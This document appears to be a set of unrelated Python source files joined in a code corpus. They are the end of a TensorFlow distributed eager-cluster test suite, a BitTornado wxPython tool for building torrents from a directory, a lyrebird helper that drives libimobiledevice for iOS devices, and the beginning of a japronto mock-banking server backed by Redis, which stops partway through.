def testDistributedFunctionServerRemovedAddedBack(self):
  """Add then remove a server, and run distributed function on cluster."""
  with ops.device(self.device_local):
    x1 = array_ops.ones([2, 2])

  @def_function.function
  def worker_fn(i):
    with ops.device(self.device_t1):
      mul = math_ops.matmul(i, i)
    return mul - array_ops.zeros_like(mul)

  # Forces function tracing and registration
  worker_fn.get_concrete_function(x1)
  # Shrink to a single worker and run there...
  context.update_server_def(server_def=self.server_def_s1)
  with ops.device(self.device_t1):
    y = worker_fn(x1)
  np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
  # ...then grow back to two workers and drive from the re-added one.
  context.update_server_def(server_def=self.server_def_s1_s2)
  with ops.device(self.device_t2):
    y = worker_fn(x1)
  np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
@test_util.run_in_async_and_sync_mode
def testDistributedFunctionBothServersReplaced(self):
  """Tests that replacing servers works correctly.

  We create two servers, t1 and t2. We first replace t2, then we replace t1.
  Among other things, this ensures that both already existing, and
  restarted workers have the context view IDs correctly updated.
  """
  with ops.device(self.device_local):
    x1 = array_ops.ones([2, 2])

  @def_function.function
  def worker_fn(i):
    # Spans both workers: matmul on t1, add on t2, subtract locally.
    with ops.device(self.device_t1):
      mul = math_ops.matmul(i, i)
    with ops.device(self.device_t2):
      add = mul + i
    return add - i

  # Forces function tracing and registration
  worker_fn.get_concrete_function(x1)
  # Replace task2
  context.update_server_def(server_def=self.server_def_s1_s3)
  for device in (self.device_t1, self.device_t2):
    with ops.device(device):
      y = worker_fn(x1)
    np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
  # Then replace task1
  context.update_server_def(server_def=self.server_def_s4_s3)
  for device in (self.device_t1, self.device_t2):
    with ops.device(device):
      y = worker_fn(x1)
    np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
def testDistributedFunctionPendingNodesServerReplaced(self):
  # Replace a worker while distributed-function calls are in flight.
  # NOTE(review): not decorated with @test_util.run_in_async_and_sync_mode
  # — confirm whether intentional.
  with ops.device(self.device_local):
    x1 = array_ops.ones([2, 2])

  @def_function.function
  def worker_fn(i):
    with ops.device(self.device_t1):
      mul = math_ops.matmul(i, i)
    with ops.device(self.device_t2):
      add = mul + i
    return add - i

  # Forces function tracing and registration.
  worker_fn.get_concrete_function(x1)
  num_calls = 10
  self._coord = coordinator.Coordinator()

  def thread_fn(device, results):
    with self._coord.stop_on_exception():
      for i in range(num_calls):
        with ops.device(device):
          y = worker_fn(x1)
        results[i] = y.numpy()

  def update_server_def_fn():
    with self._coord.stop_on_exception():
      for i in range(num_calls):
        # Flip t3 in and out of the cluster while calls are pending.
        context.update_server_def(
            server_def=(self.server_def_s1_s2_s3 if i %
                        2 == 0 else self.server_def_s1_s2))

  results = [None] * num_calls
  threads = []
  threads.append(
      threading.Thread(target=thread_fn, args=(self.device_t1, results)))
  threads.append(threading.Thread(target=update_server_def_fn))
  for t in threads:
    t.start()
  self._coord.join(threads)
  for result in results:
    np.testing.assert_array_equal([[2, 2], [2, 2]], result)
def testParameterServerMultiExecutors(self):
  """Parameter-server-style variable updates issued from two executors
  while the cluster is repeatedly refreshed with the same server def."""
  context.update_server_def(server_def=self.server_def_s1_s2_s3_s4)
  # Variables live on t1/t2 (the "parameter servers").
  with ops.device(self.device_t1):
    v1 = variables.Variable(initial_value=0.)
  with ops.device(self.device_t2):
    v2 = variables.Variable(initial_value=10.)

  @def_function.function
  def worker_fn():
    x1 = v1.read_value()
    x2 = v2.read_value()
    # Moves v1 and v2 towards each other; their sum stays 10.
    grad = (x1 + x2) * 0.1
    v1.assign_add(grad)
    v2.assign_sub(grad)
    return v1 + v2

  worker_fn.get_concrete_function()
  # Dedicated synchronous executors for the two "workers" t3/t4.
  executor_t3 = executor.new_executor(enable_async=False)
  executor_t4 = executor.new_executor(enable_async=False)
  num_calls = 10
  self._coord = coordinator.Coordinator()

  def thread_fn(executor_obj, device, results):
    with self._coord.stop_on_exception():
      for i in range(num_calls):
        with context.executor_scope(executor_obj):
          with ops.device(device):
            results[i] = worker_fn()

  def update_server_def_fn():
    with self._coord.stop_on_exception():
      for _ in range(30):
        context.update_server_def(self.server_def_s1_s2_s3_s4)

  t3_results = [None] * num_calls
  t4_results = [None] * num_calls
  threads = []
  threads.append(
      threading.Thread(
          target=thread_fn, args=(executor_t3, self.device_t3, t3_results)))
  threads.append(
      threading.Thread(
          target=thread_fn, args=(executor_t4, self.device_t4, t4_results)))
  threads.append(threading.Thread(target=update_server_def_fn))
  for t in threads:
    t.start()
  self._coord.join(threads)
  # Cannot assert individual values since the results are non-deterministic.
  # By summing up the value we ensure that there are all reasonable and valid
  # numbers (not `None` or `NaN`).
  total = np.sum(t3_results + t4_results)
  self.assertGreater(total, 0)
def testCheckAlive(self):
  """check_alive needs an initialized context and a known worker name."""
  # Before the context exists, the call must be rejected outright.
  with self.assertRaisesRegex(ValueError, "Context is not initialized."):
    context.check_alive("/job:remote_device/task:0")
  context.context().ensure_initialized()
  # Both configured remote tasks should report as alive.
  for worker in ("/job:remote_device/replica:0/task:0",
                 "/job:remote_device/replica:0/task:1"):
    self.assertTrue(context.check_alive(worker))
  # A task index outside the cluster is an error, not merely "not alive".
  with self.assertRaisesRegex(errors.InvalidArgumentError,
                              "Unable to find worker interface"):
    context.check_alive("/job:remote_device/replica:0/task:10")
if __name__ == "__main__":
  # These tests exercise cluster updates in eager mode only.
  ops.enable_eager_execution()
  test.main()
|
btcompletedirgui.py | #!/usr/bin/env python
# Written by Bram Cohen
# see LICENSE.txt for license information
# Optionally enable the psyco JIT when the BitTornado build requests it.
from BitTornado import PSYCO
if PSYCO.psyco:
    try:
        import psyco
        assert psyco.__version__ >= 0x010100f0
        psyco.full()
    except:
        pass
from sys import argv, version
assert version >= '2', "Install Python 2.0 or greater"
from BitTornado.BT1.makemetafile import completedir,completedir_recursion
from threading import Event, Thread
import sys
from os import getcwd,makedirs
from os.path import join,sep,exists
try:
    from wxPython.wx import *
except:
    print 'wxPython is either not installed or has not been installed properly.'
    sys.exit(1)
# Compatibility shim for pre-2.2 Pythons without bool literals.
try:
    True
except:
    True = 1
    False = 0
# Custom wx event type used to marshal calls back onto the GUI thread.
wxEVT_INVOKE = wxNewEventType()
def EVT_INVOKE(win, func):
    # Route InvokeEvent instances posted to `win` to handler `func`.
    win.Connect(-1, -1, wxEVT_INVOKE, func)
class InvokeEvent(wxPyEvent):
    """Carries a callable plus its arguments across threads via wxPostEvent."""
    def __init__(self, func, args, kwargs):
        wxPyEvent.__init__(self)
        self.SetEventType(wxEVT_INVOKE)
        self.func = func
        self.args = args
        self.kwargs = kwargs
class DownloadInfo:
    """Main window: collects a directory, announce URL and piece size,
    then launches a CompleteDir build when 'make' is pressed."""
    def __init__(self):
        frame = wxFrame(None, -1, 'BitTorrent complete dir 1.0.1', size = wxSize(550, 250))
        self.frame = frame
        panel = wxPanel(frame, -1)
        gridSizer = wxFlexGridSizer(cols = 2, rows = 2, vgap = 15, hgap = 8)
        gridSizer.Add(wxStaticText(panel, -1, 'directory to build:'))
        self.dirCtl = wxTextCtrl(panel, -1, '')
        b = wxBoxSizer(wxHORIZONTAL)
        b.Add(self.dirCtl, 1, wxEXPAND)
#        b.Add(10, 10, 0, wxEXPAND)
        button = wxButton(panel, -1, 'select')
        b.Add(button, 0, wxEXPAND)
        EVT_BUTTON(frame, button.GetId(), self.select)
        gridSizer.Add(b, 0, wxEXPAND)
        gridSizer.Add(wxStaticText(panel, -1, 'announce url:'))
        self.annCtl = wxTextCtrl(panel, -1, '')
        gridSizer.Add(self.annCtl, 0, wxEXPAND)
        gridSizer.Add(wxStaticText(panel, -1, 'piece size:'))
        self.piece_length = wxChoice(panel, -1, choices = ['2 ** 21', '2 ** 20', '2 ** 19',
            '2 ** 18', '2 ** 17', '2 ** 16', '2 ** 15'])
        # Default selection: index 3 -> 2 ** 18 byte pieces.
        self.piece_length.SetSelection(3)
        gridSizer.Add(self.piece_length)
        gridSizer.AddGrowableCol(1)
        border = wxBoxSizer(wxVERTICAL)
        border.Add(gridSizer, 0, wxEXPAND | wxNORTH | wxEAST | wxWEST, 25)
        b2 = wxButton(panel, -1, 'make')
        # border.Add(10, 10, 1, wxEXPAND)
        border.Add(b2, 0, wxALIGN_CENTER | wxSOUTH, 20)
        EVT_BUTTON(frame, b2.GetId(), self.complete)
        panel.SetSizer(border)
        panel.SetAutoLayout(True)
    def select(self, x):
        # Directory picker for the build target.
        dl = wxDirDialog(self.frame, style = wxDD_DEFAULT_STYLE | wxDD_NEW_DIR_BUTTON)
        if dl.ShowModal() == wxID_OK:
            self.dirCtl.SetValue(dl.GetPath())
    def complete(self, x):
        # 'make' button handler: validate input and start the build window.
        if self.dirCtl.GetValue() == '':
            dlg = wxMessageDialog(self.frame, message = 'You must select a directory',
                caption = 'Error', style = wxOK | wxICON_ERROR)
            dlg.ShowModal()
            dlg.Destroy()
            return
        try:
            # Choice index 0..6 maps to piece size 2**21 .. 2**15.
            ps = 21 - self.piece_length.GetSelection()
            CompleteDir(self.dirCtl.GetValue(), self.annCtl.GetValue(), ps)
        except:
            # print_exc is bound at module scope (imported after this class
            # body, but before any GUI callback can run).
            print_exc()
from traceback import print_exc
class CompleteDir:
    """Progress window that builds .torrent files for a directory tree in a
    background thread, marshalling progress updates onto the GUI thread."""
    def __init__(self, d, a, pl):
        # d: source directory, a: announce URL, pl: piece size (power of 2).
        self.d = d
        self.a = a
        self.pl = pl
        # Set when the user cancels or closes the window; checked by workers.
        self.flag = Event()
        frame = wxFrame(None, -1, 'BitTorrent make directory', size = wxSize(550, 250))
        self.frame = frame
        panel = wxPanel(frame, -1)
        gridSizer = wxFlexGridSizer(cols = 1, vgap = 15, hgap = 8)
        self.currentLabel = wxStaticText(panel, -1, 'checking file sizes')
        gridSizer.Add(self.currentLabel, 0, wxEXPAND)
        self.gauge = wxGauge(panel, -1, range = 1000, style = wxGA_SMOOTH)
        gridSizer.Add(self.gauge, 0, wxEXPAND)
        #gridSizer.Add(10, 10, 1, wxEXPAND)
        self.button = wxButton(panel, -1, 'cancel')
        gridSizer.Add(self.button, 0, wxALIGN_CENTER)
        gridSizer.AddGrowableRow(2)
        gridSizer.AddGrowableCol(0)
        g2 = wxFlexGridSizer(cols = 1, vgap = 15, hgap = 8)
        g2.Add(gridSizer, 1, wxEXPAND | wxALL, 25)
        g2.AddGrowableRow(0)
        g2.AddGrowableCol(0)
        panel.SetSizer(g2)
        panel.SetAutoLayout(True)
        EVT_BUTTON(frame, self.button.GetId(), self.done)
        EVT_CLOSE(frame, self.done)
        EVT_INVOKE(frame, self.onInvoke)
        frame.Show(True)
        # Do the hashing off the GUI thread.
        Thread(target = self.complete).start()
    def complete(self):
        # Worker thread: build all torrents into <d>/torrents and write an
        # index file ("downlist.txt") listing them.
        params = {'piece_size_pow2': self.pl}
        self.dst_dir = params['target'] = self.d + sep + 'torrents'
        if not exists(params['target']):
            makedirs(params['target'])
        #wxMessageBox( params['target'], 'Title', wxOK)
        try:
            lists = completedir_recursion(self.d, self.a, params, self.flag, self.valcallback, self.filecallback)
            listname = join(self.dst_dir,"downlist.txt")
            listfile = open(listname,'w')
            listfile.write(lists.encode('utf-8'))
            listfile.close()
            if not self.flag.isSet():
                self.currentLabel.SetLabel('Done!')
                self.gauge.SetValue(1000)
                self.button.SetLabel('Close')
        except (OSError, IOError), e:
            self.currentLabel.SetLabel('Error!')
            self.button.SetLabel('Close')
            dlg = wxMessageDialog(self.frame, message = 'Error - ' + str(e),
                caption = 'Error', style = wxOK | wxICON_ERROR)
            dlg.ShowModal()
            dlg.Destroy()
    def valcallback(self, amount):
        # Called from the worker thread; forward to the GUI thread.
        self.invokeLater(self.onval, [amount])
    def onval(self, amount):
        # amount is a fraction in [0, 1]; gauge range is 1000.
        self.gauge.SetValue(int(amount * 1000))
    def filecallback(self, f):
        # Called from the worker thread; forward to the GUI thread.
        self.invokeLater(self.onfile, [f])
    def onfile(self, f):
        self.currentLabel.SetLabel('building ' + join(self.d, f) + '.torrent')
    def onInvoke(self, event):
        # GUI thread: run the marshalled call unless we have been cancelled.
        if not self.flag.isSet():
            apply(event.func, event.args, event.kwargs)
    def invokeLater(self, func, args = [], kwargs = {}):
        # NOTE(review): mutable defaults are safe here only because they are
        # never mutated; fresh lists per call would be cleaner.
        if not self.flag.isSet():
            wxPostEvent(self.frame, InvokeEvent(func, args, kwargs))
    def done(self, event):
        # Cancel button / window close: stop the worker and tear down.
        self.flag.set()
        self.frame.Destroy()
class btWxApp(wxApp):
    """Application shell: builds and shows the main window on startup."""
    def OnInit(self):
        d = DownloadInfo()
        d.frame.Show(True)
        self.SetTopWindow(d.frame)
        return True
if __name__ == '__main__':
    # wxApp.__init__ invokes OnInit, which creates and shows the main frame.
    btWxApp().MainLoop()
|
ios_helper.py | import os, plistlib, subprocess, threading, codecs, json, time
from pathlib import Path
import lyrebird
from lyrebird import context
from lyrebird.mock import logger_helper
from .helper import config
_log = logger_helper.get_logger()
# Absolute paths to the libimobiledevice command-line tools; populated by
# check_environment() once the installation has been verified.
ideviceinstaller = None
idevice_id = None
idevicescreenshot = None
ideviceinfo = None
idevicesyslog = None
root = os.path.dirname(__file__)
static = os.path.abspath(os.path.join(root, 'static'))
# ProductType -> marketing-name lookup table (JSON).
model_json = os.path.abspath(os.path.join(root, 'config/comparison_table_model.json'))
storage = lyrebird.get_plugin_storage()
tmp_dir = os.path.abspath(os.path.join(storage, 'tmp'))
crash_dir = os.path.abspath(os.path.join(storage, 'crash'))
PLUGIN_ROOT_PATH = Path('~', '.lyrebird/plugins/lyrebird_ios').expanduser()
PLIST_PATH = os.path.join(PLUGIN_ROOT_PATH, 'plist')
# Last environment-check result served to the frontend (None = not checked).
error_msg = None
if not os.path.exists(tmp_dir):
    os.makedirs(tmp_dir)
if not os.path.exists(crash_dir):
    os.makedirs(crash_dir)
class libimobiledeviceError(Exception):
    """Raised when the libimobiledevice tools are missing or not working."""
    pass
class ideviceinstallerError(Exception):
    """Raised when the ideviceinstaller tool is missing or not working."""
    pass
def check_environment():
    """Check the user's environment: verify the third-party dependencies
    are correctly installed.  (Translated from the original Chinese
    docstring.)

    On success, populates the module-level tool-path globals and clears
    error_msg; on failure, sets error_msg for the UI and raises.
    :return:
    """
    global ideviceinstaller, idevice_id, idevicescreenshot, ideviceinfo, idevicesyslog, error_msg
    # Each failed check publishes a UI-facing error_msg, pauses, then raises.
    # NOTE(review): the sleep(20) presumably keeps the message visible to a
    # polling frontend before the plugin dies — confirm.
    if not os.path.exists('/usr/local/bin/ideviceinfo'):
        error_msg = {"show_error": True,
                     "user_message": "No ideviceinfo program found, need libimobiledevice dependencies with Homebrew, See README Help Center"}
        time.sleep(20)
        raise libimobiledeviceError('No libimobiledevice program found, See README Help Center')
    else:
        # The binary exists; make sure it actually runs cleanly.
        p = subprocess.Popen('/usr/local/bin/ideviceinfo', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        err = p.stderr.read().decode()
        if len(err):
            error_msg = {"show_error": True,
                         "user_message": "ideviceinfo program found but not working with error -> %s, See README Help Center" % err}
            time.sleep(20)
            raise libimobiledeviceError('ideviceinfo program found but not working with error -> %s, See README Help Center' % err)
    if not os.path.exists('/usr/local/bin/ideviceinstaller'):
        error_msg = {"show_error": True,
                     "user_message": "No ideviceinstaller program found, need ideviceinstaller dependencies use Homebrew, See README Help Center"}
        time.sleep(20)
        raise ideviceinstallerError("No ideviceinstaller program found, need ideviceinstaller dependencies use Homebrew, See README Help Center")
    if not os.path.exists('/usr/local/bin/idevicescreenshot'):
        error_msg = {"show_error": True,
                     "user_message": "No idevicescreenshot program found, need libimobiledevice dependencies use Homebrew, See README Help Center"}
        time.sleep(20)
        raise libimobiledeviceError('No idevicescreenshot program found, See README Help Center')
    # All tools verified: record their absolute paths for the module.
    idevice_id = '/usr/local/bin/idevice_id'
    ideviceinstaller = '/usr/local/bin/ideviceinstaller'
    ideviceinfo = '/usr/local/bin/ideviceinfo'
    idevicesyslog = '/usr/local/bin/idevicesyslog'
    idevicescreenshot = '/usr/local/bin/idevicescreenshot'
    error_msg = {"show_error": False, "user_message": ""}
def read_plist(plist_path):
    """Parse the plist file at *plist_path* and return its contents.

    Uses plistlib.load, which auto-detects XML and binary plists.
    plistlib.readPlist was deprecated in Python 3.4 and removed in 3.9,
    so the previous implementation breaks on modern interpreters.
    """
    with open(plist_path, 'rb') as f:
        return plistlib.load(f)
class Apps:
    """Base class for installed applications on a device.

    Holds the plist path and bundle id; provides methods to list the
    installed apps and to fetch details of a specific app.
    (Translated from the original Chinese docstring.)
    """
    def __init__(self):
        self._plist = None
        self.bundle_id = None
        self.app_info = {}

    @property
    def plist(self):
        # Absolute path of the device's app-list plist (set via the setter).
        return self._plist

    @plist.setter
    def plist(self, name):
        # Accepts a file name inside PLIST_PATH; silently keeps the previous
        # value when that file does not exist.
        plist_path = os.path.join(PLIST_PATH, name)
        if os.path.exists(plist_path):
            self._plist = plist_path

    @property
    def apps(self):
        # Parsed list of app dictionaries (re-reads the plist on each access).
        return read_plist(self.plist)

    @property
    def app_key(self):
        """Mapping of plist keys -> display names; configurable through the
        plugin config ('app_info') with a sensible default."""
        conf = config.load()
        if hasattr(conf, 'app_info'):
            # Reuse the already-loaded config; the previous code called
            # config.load() a second time here.
            return conf.app_info
        else:
            return {
                "CFBundleName": "AppName",
                "CFBundleIdentifier": "BundleID",
                "CFBundleShortVersionString": "VersionNumber",
                "CFBundleVersion": "BuildNumber"
            }

    def app(self, bundle_id):
        """Return the first app whose CFBundleIdentifier contains bundle_id,
        or None when there is no match."""
        for app in self.apps:
            if bundle_id in app.get('CFBundleIdentifier'):
                return app

    def get_app_list(self):
        """Return [{'app_name', 'bundle_id', 'label'}, ...] for all apps."""
        app_list = []
        for app in self.apps:
            tmp = {}
            tmp["app_name"] = app.get('CFBundleName')
            tmp['bundle_id'] = app.get('CFBundleIdentifier')
            tmp['label'] = '%s %s' % (app.get('CFBundleName'), app.get('CFBundleIdentifier'))
            app_list.append(tmp)
        return app_list

    def get_app_info(self, bundle_id):
        """Return selected info for bundle_id, keyed by the app_key names."""
        # Look the app up once. The previous code called self.app(bundle_id)
        # inside the loop, re-reading and re-scanning the whole plist once
        # per key.
        app = self.app(bundle_id)
        for k, v in self.app_key.items():
            self.app_info[v] = app.get(k)
        return self.app_info
class Device:
    """Represents a single connected iOS device.

    Main attributes include device_id, model, os_version, etc.; main methods
    include taking screenshots and fetching device information.
    (Translated from the original Chinese docstring.)

    Wraps the libimobiledevice command-line tools (ideviceinfo,
    idevicesyslog, ideviceinstaller, idevicescreenshot) via subprocess.
    """
    def __init__(self, device_id):
        self.device_id = device_id
        self.model = None
        self.is_jailbreak = None
        self.phone_number = None
        self.os_version = None
        self.device_name = None
        self.sn = None
        self._log_process = None
        self._log_cache = []
        self._log_crash_cache = []
        self._log_file = None
        # NOTE(review): filename says "android" — looks copy-pasted from the
        # Android helper; take_screen_shot() does not use this path. Confirm
        # before renaming.
        self._screen_shot_file = os.path.abspath(os.path.join(tmp_dir, 'android_screenshot_%s.png' % self.device_id))
        self._anr_file = None
        self._crash_file_list = []
        self._device_info = None
        self._apps_list = None
        self.start_catch_log = False
        self._pid = None

    @property
    def log_file(self):
        # Path of the captured syslog file (set by start_log).
        return self._log_file

    @property
    def screen_shot_file(self):
        return self._screen_shot_file

    @property
    def anr_file(self):
        return self._anr_file

    @property
    def crash_file_list(self):
        return self._crash_file_list

    @classmethod
    def read_line(cls, line):
        """Build a Device from one `idevice_id -l` output line (a UDID) by
        querying `ideviceinfo` and parsing its 'Key: value' output."""
        res = subprocess.run(f'{ideviceinfo} -u {line}', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        lines = res.stdout.decode()
        device_info = [info for info in lines.split('\n') if info]
        _device = cls(line)
        if len(device_info) < 2:
            _log.error(f'Read device info line error. {lines}')
            raise libimobiledeviceError('Failed to got device info, Please make sure \'deviceinfo\' command is working on your system.')
        for info in device_info:
            info_kv = info.split(':')
            if info_kv[0] == 'ProductType':
                # NOTE(review): cls(line) creates a throwaway instance just
                # to call convert_model — _device.convert_model would do.
                _device.model = cls(line).convert_model(model=info_kv[1].strip())
            if info_kv[0] == 'BrickState':
                _device.is_jailbreak = info_kv[1].strip()
            if info_kv[0] == 'PhoneNumber':
                _device.phone_number = info_kv[1].strip()
            if info_kv[0] == 'ProductVersion':
                _device.os_version = info_kv[1].strip()
            if info_kv[0] == 'DeviceName':
                _device.device_name = info_kv[1].strip()
            if info_kv[0] == 'SerialNumber':
                _device.sn = info_kv[1].strip()
        return _device

    def convert_model(self, model):
        """Map an Apple ProductType (e.g. 'iPhone10,3') to a marketing name
        using the bundled JSON table; returns None for unknown models."""
        model_dict = json.loads(codecs.open(model_json, 'r', 'utf-8').read())
        return model_dict.get(model)

    def start_log(self):
        """Start streaming the device syslog to a file and the web UI."""
        self.stop_log()
        log_file_name = 'ios_log_%s.log' % self.device_id
        self._log_file = os.path.abspath(os.path.join(tmp_dir, log_file_name))
        # NOTE(review): p is never stored in self._log_process, so stop_log()
        # cannot actually kill this syslog subprocess — confirm.
        p = subprocess.Popen(f'{idevicesyslog} -u {self.device_id}', shell=True, stdout=subprocess.PIPE)
        def log_handler(logcat_process):
            # Reader thread: batch lines and flush to file + socket.io in
            # chunks of 5000 to limit emit frequency.
            log_file = codecs.open(self._log_file, 'w', 'utf-8')
            while True:
                line = logcat_process.stdout.readline()
                if not line:
                    # EOF: push whatever is buffered and stop.
                    context.application.socket_io.emit('log', self._log_cache, namespace='/iOS-plugin')
                    log_file.close()
                    return
                # self.crash_checker(line)
                # self.anr_checker(line)
                self._log_cache.append(line.decode(encoding='UTF-8', errors='ignore'))
                if len(self._log_cache) >= 5000:
                    context.application.socket_io.emit('log', self._log_cache, namespace='/iOS-plugin')
                    log_file.writelines(self._log_cache)
                    log_file.flush()
                    self._log_cache = []
        threading.Thread(target=log_handler, args=(p,)).start()

    def crash_checker(self, line):
        """Accumulate crash-log lines and publish a crash event.

        NOTE(review): the markers ('FATAL EXCEPTION', 'AndroidRuntime') and
        file names are Android logcat conventions — apparently copy-pasted
        from the Android helper, and currently disabled (the calls in
        start_log are commented out). Confirm before relying on it.
        """
        crash_log_path = os.path.join(crash_dir, 'android_crash_%s.log' % self.device_id)
        if str(line).find('FATAL EXCEPTION') > 0:
            self.start_catch_log = True
            self._log_crash_cache.append(str(line))
            lyrebird.publish('crash', 'android', path=crash_log_path, id=self.device_id)
        elif str(line).find('AndroidRuntime') > 0 and self.start_catch_log:
            self._log_crash_cache.append(str(line))
        else:
            self.start_catch_log = False
            with codecs.open(crash_log_path, 'w') as f:
                f.write('\n'.join(self._log_crash_cache))

    def anr_checker(self, line):
        # NOTE(review): self.get_anr_log is not defined anywhere in this
        # class, so a match would raise AttributeError; currently unreachable
        # because the caller in start_log is commented out.
        if str(line).find('ANR') > 0 and str(line).find('ActivityManager') > 0:
            self.get_anr_log()

    @property
    def device_info(self):
        # Lazily cached raw `ideviceinfo` output lines.
        if not self._device_info:
            self._device_info = self.get_properties()
        return self._device_info

    def get_properties(self):
        """Return `ideviceinfo` output lines, or None when the tool fails."""
        p = subprocess.run(f'{ideviceinfo} -u {self.device_id}', shell=True, stdout=subprocess.PIPE)
        if p.returncode == 0:
            return p.stdout.decode().split('\n')

    def get_app_info(self, bundle_id):
        """Refresh the installed-app plist, then return details of bundle_id."""
        self.get_device_plist(self.device_id)
        apps = Apps()
        apps.plist = self.device_id + '.plist'
        return apps.get_app_info(bundle_id)

    def get_device_plist(self, device_id):
        """Dump the installed-app list as XML to PLIST_PATH/<udid>.plist."""
        plist_path = '%s/%s.plist' % (PLIST_PATH, self.device_id)
        if not os.path.exists(PLIST_PATH):
            os.mkdir(PLIST_PATH)
        p = subprocess.Popen(f'{ideviceinstaller} -u {self.device_id} -l -o xml > {plist_path}', shell=True)
        p.wait()

    def get_apps_list(self, device_id):
        """Return the installed apps as a list of name/bundle-id dicts."""
        self.get_device_plist(device_id)
        apps = Apps()
        apps.plist = self.device_id + '.plist'
        return apps.get_app_list()

    def stop_log(self):
        # Kill the tracked log process, if any (see the note in start_log:
        # the syslog subprocess is currently never tracked).
        if self._log_process:
            self._log_process.kill()
            self._log_process = None

    def take_screen_shot(self):
        """Capture a PNG screenshot into tmp_dir; return its path, or False
        when idevicescreenshot fails."""
        file_name = self.device_name.replace(' ', '_')
        p = subprocess.run(f'{idevicescreenshot} -u {self.device_id} {tmp_dir}/{file_name}.png', shell=True)
        if p.returncode == 0:
            return os.path.abspath(os.path.join(tmp_dir, '%s.png' % file_name))
        else:
            return False

    def to_dict(self):
        """Serialise public attributes plus selected extra properties."""
        device_info = {k: self.__dict__[k] for k in self.__dict__ if not k.startswith('_')}
        # get additional device info
        prop_lines = self.device_info
        if not prop_lines:
            return device_info
        # NOTE(review): the ro.build.* keys below are Android system
        # properties; `ideviceinfo` output should never contain them, so
        # these branches look like dead copy-paste from the Android helper.
        for line in prop_lines:
            # Baseband version (translated comment)
            if 'ro.build.expect.baseband' in line:
                baseband = line[line.rfind('[')+1:line.rfind(']')].strip()
                device_info['baseBand'] = baseband
            # Build number (translated comment)
            if 'ro.build.id' in line:
                build_id = line[line.rfind('[') + 1:line.rfind(']')].strip()
                device_info['buildId'] = build_id
            # Android version (translated comment)
            if 'ro.build.version.release' in line:
                build_version = line[line.rfind('[') + 1:line.rfind(']')].strip()
                device_info['releaseVersion'] = build_version
        return device_info
def devices():
    """Return the collection of online device instances.
    (Translated from the original Chinese docstring.)

    :return: dict mapping device UDID -> Device for every connected device;
             empty dict when the listing command fails or nothing is attached.
    """
    check_environment()
    res = subprocess.run(f'{idevice_id} -l', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    output = res.stdout.decode()
    err_str = res.stderr.decode()
    # Command failed: empty stdout together with non-empty stderr.
    if len(output) <= 0 < len(err_str):
        print('Get devices list error', err_str)
        # Fix: return a dict here as on every other path; the previous code
        # returned a list, giving callers an inconsistent type on error.
        return {}
    online_devices = {}
    # One UDID per non-empty output line; an empty listing falls through
    # and yields an empty dict (the old explicit len(lines)==0 check was
    # redundant).
    for line in (l for l in output.split('\n') if l):
        device = Device.read_line(line)
        online_devices[device.device_id] = device
    return online_devices
|
server_japronto_oauth2.py | import os
import sys
import random
import ujson
import uuid
import uvloop
import asyncio
import asyncio_redis
import calendar
try:
    # Make local modules importable regardless of the working directory.
    sys.path.append(os.path.abspath('./'))
except Exception as e:
    print(str(e.args))
    exit(1)
from datetime import datetime, timedelta
from multiprocessing import Process, Queue
from japronto import Application
from decimal import *
# Use uvloop's event-loop implementation for asyncio.
uvloop.install()
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
asyncio.set_event_loop(uvloop.new_event_loop())
# In-memory "database" collections, keyed by name in `lists` below.
CUSTOMERS = []
ACCOUNTS = []
CREDIT_CARDS = []
MOVEMENTS = []
TRANSACTIONS = []
lists = {
    "accounts": ACCOUNTS,
    "credit_cards": CREDIT_CARDS,
    "customers": CUSTOMERS,
    "movements": MOVEMENTS,
    "transactions": TRANSACTIONS
}
# Attributes the generic() handler recognises as filterable.
json_attributes = [
    'origin',
    'target',
    'type',
    'number',
    'customer_id',
    'id',
    'account',
    'account_id',
    'alias',
    'brand',
    'transaction_id'
]
port = int(os.getenv('PORT', 8080))
redis_params = {
    'host': os.getenv('REDIS_SERVER', '127.0.0.1'),
    'port': int(os.getenv('REDIS_PORT', 6379)),
    'password': os.getenv('REDIS_PASSWORD'),
    'poolsize': int(os.getenv('REDIS_POOL', 7))
}
# OAuth/bookkeeping query-string keys stripped before filtering.
# NOTE(review): "cientid" looks like a typo for "clientid" — confirm against
# API clients before changing the runtime value.
delete_query_strings = [
    "apikey",
    "secret",
    "secretid",
    "cientid",
    "api-key",
    "secret-id",
    "client_id",
    "code",
    "error"
]
conn = None
queue = Queue()
app = Application()
rt = app.router
def add_months(source_date, months):
    """Return *source_date* shifted by *months* calendar months.

    The day of month is clamped to the last valid day of the target month
    (e.g. Jan 31 + 1 month -> Feb 28/29). Negative offsets work too.
    """
    months_total = source_date.month - 1 + months
    carry_years, month_zero_based = divmod(months_total, 12)
    new_year = source_date.year + carry_years
    new_month = month_zero_based + 1
    last_day = calendar.monthrange(new_year, new_month)[1]
    return datetime(new_year, new_month, min(source_date.day, last_day))
def serialize(process_queue):
    """Worker-process entry point: persist the in-memory lists to Redis.

    Blocks forever reading JSON messages from *process_queue*; each
    message's "data" field names the collections to rewrite (delete the
    Redis key, then rpush every item). Intended to run inside a separate
    multiprocessing.Process with its own event loop.
    """
    async def redis_serialize(p_queue):
        async def push(key, items):
            values = [ujson.dumps(item) for item in items]
            if len(values) > 0:
                await redis_conn.rpush(key, values)
        redis_conn = await asyncio_redis.Pool.create(**redis_params)
        while True:
            # NOTE(review): p_queue.get() blocks the event loop; presumably
            # acceptable because this coroutine is the only task in this
            # process — confirm.
            obj = ujson.loads(p_queue.get())
            keys = [i.lower() for i in obj["data"]]
            if len(keys) > 0:
                await redis_conn.delete(keys)
            tasks = []
            for k, v in lists.items():
                if k in keys:
                    tasks.append(push(k, v))
            await asyncio.gather(*tasks)
    try:
        # Local imports: this function runs in a freshly spawned process.
        # NOTE(review): `import concurrent` alone does not import
        # concurrent.futures; it works here only because asyncio imports it
        # internally — confirm.
        import concurrent
        import selectors
        import asyncio
        import asyncio_redis
        import ujson
        executor = concurrent.futures.ThreadPoolExecutor()
        selector = selectors.SelectSelector()
        loop = asyncio.SelectorEventLoop(selector)
        loop.set_default_executor(executor)
        asyncio.set_event_loop(loop)
        asyncio.ensure_future(redis_serialize(process_queue))
        loop.run_forever()
    except Exception as exception:
